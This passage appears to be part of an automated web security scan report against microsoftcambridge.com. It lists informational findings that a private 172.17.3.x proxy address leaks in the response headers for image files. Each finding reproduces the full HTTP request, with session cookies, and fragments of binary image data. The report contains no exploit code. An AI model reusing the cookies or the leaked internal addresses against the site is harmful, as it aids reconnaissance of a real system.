...IHDR...............*....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.141. http://microsoftcambridge.com/img/home/latest_feeds.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/latest_feeds.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/latest_feeds.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:09 GMT
Content-Length: 3384
Date: Sat, 26 Mar 2011 01:40:29 GMT
X-Varnish: 1939060142
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR............W......tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.142. http://microsoftcambridge.com/img/home/latest_tweet.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/latest_tweet.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/latest_tweet.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Mon, 20 Jul 2009 20:53:39 GMT
Content-Length: 3517
Date: Sat, 26 Mar 2011 01:40:33 GMT
X-Varnish: 1939061208
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......".....>.......tEXtSoftware.Adobe ImageReadyq.e<.._IDATx..\[.$.Y.N]../.=.....Y..@^d.I..$&k..;.....@d.    ..!;._....8"..-....<..HV..8.'...x.b.Y.={..\...R..9....E.g.gv6O.Ig....s.....
...[SNIP]...
24.143. http://microsoftcambridge.com/img/home/people.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/people.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/people.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:11 GMT
Content-Length: 3145
Date: Sat, 26 Mar 2011 01:40:24 GMT
X-Varnish: 1939058625
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...6.........).N.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.144. http://microsoftcambridge.com/img/home/people_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/people_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/people_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:13 GMT
Content-Length: 3131
Date: Sat, 26 Mar 2011 01:40:31 GMT
X-Varnish: 1939060827
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...6.........).N.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.145. http://microsoftcambridge.com/img/home/search.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/search.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/search.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:16 GMT
Content-Length: 642
Date: Sat, 26 Mar 2011 01:40:30 GMT
X-Varnish: 1939060470
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...N.........fX.....tEXtSoftware.Adobe ImageReadyq.e<...$IDATx..W.q.0.u..W.#.n.#....`.0B<@?..0B.........|.{.A@.;. @V..{....n......G..W...>.....O3o.!v.~.~.|..........y..|Y.{.!xC.b.%...
...[SNIP]...
24.146. http://microsoftcambridge.com/img/home/share.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/share.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/share.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:18 GMT
Content-Length: 582
Date: Sat, 26 Mar 2011 01:40:30 GMT
X-Varnish: 1939060456
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...D.........D......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.q.0.v.....@.........a.x.>......0By.K..>.t...Dw:..?.>}....]    2b|..{98m.VN'..iG..0.N.b7N...    .~8=a.....8OO4..C.`...d...^.
...[SNIP]...
24.147. http://microsoftcambridge.com/img/home/subscribe.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/subscribe.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/subscribe.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 26 Jun 2009 18:50:09 GMT
Content-Length: 3487
Date: Sat, 26 Mar 2011 01:40:30 GMT
X-Varnish: 1939060458
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...h........E%+H....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.148. http://microsoftcambridge.com/img/home/teams.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/teams.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/teams.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:21 GMT
Content-Length: 3210
Date: Sat, 26 Mar 2011 01:40:24 GMT
X-Varnish: 1939058613
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.149. http://microsoftcambridge.com/img/home/teams_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/teams_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/teams_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:23 GMT
Content-Length: 3209
Date: Sat, 26 Mar 2011 01:40:31 GMT
X-Varnish: 1939060829
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.150. http://microsoftcambridge.com/img/home/working.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/working.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/working.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:24 GMT
Content-Length: 3528
Date: Sat, 26 Mar 2011 01:40:25 GMT
X-Varnish: 1939058910
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...l...........X.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.151. http://microsoftcambridge.com/img/home/working_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/working_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/working_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:25 GMT
Content-Length: 3528
Date: Sat, 26 Mar 2011 01:40:32 GMT
X-Varnish: 1939060920
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...l...........X.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.152. http://microsoftcambridge.com/img/microsoft-new-england-rdc.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/microsoft-new-england-rdc.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/microsoft-new-england-rdc.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 26 Jun 2009 18:07:32 GMT
Content-Length: 8543
Date: Sat, 26 Mar 2011 01:40:29 GMT
X-Varnish: 1939060064
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......S.......O....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.153. http://microsoftcambridge.com/img/microsoft_events_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/microsoft_events_bg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/microsoft_events_bg.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 12 Mar 2010 20:11:49 GMT
Content-Length: 185211
Date: Sat, 26 Mar 2011 01:42:30 GMT
X-Varnish: 1939097224
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky.......(....
.http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c036 46.27
...[SNIP]...
24.154. http://microsoftcambridge.com/img/microsoft_home_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/microsoft_home_bg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/microsoft_home_bg.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 13 Feb 2009 18:53:54 GMT
Content-Length: 166825
Date: Sat, 26 Mar 2011 01:40:21 GMT
X-Varnish: 1939057933
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky............
.http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c036 46.27
...[SNIP]...
24.155. http://microsoftcambridge.com/img/microsoft_people_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/microsoft_people_bg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/microsoft_people_bg.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 13 Feb 2009 18:53:56 GMT
Content-Length: 96169
Date: Sat, 26 Mar 2011 01:42:20 GMT
X-Varnish: 1939094653
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky............
.http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c036 46.27
...[SNIP]...
24.156. http://microsoftcambridge.com/img/microsoft_teams_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/microsoft_teams_bg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/microsoft_teams_bg.jpg HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/jpeg
Last-Modified: Fri, 13 Feb 2009 18:53:58 GMT
Content-Length: 133424
Date: Sat, 26 Mar 2011 01:42:11 GMT
X-Varnish: 1939092090
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

......JFIF.....d.d......Ducky............
.http://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c036 46.27
...[SNIP]...
24.157. http://microsoftcambridge.com/img/people/about.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/about.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/about.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:42 GMT
Content-Length: 3155
Date: Sat, 26 Mar 2011 01:42:22 GMT
X-Varnish: 1939095172
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.158. http://microsoftcambridge.com/img/people/about_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/people/about_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/people/about_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/People/tabid/56/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:44 GMT
Content-Length: 3156
Date: Sat, 26 Mar 2011 01:42:28 GMT
X-Varnish: 1939096914
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
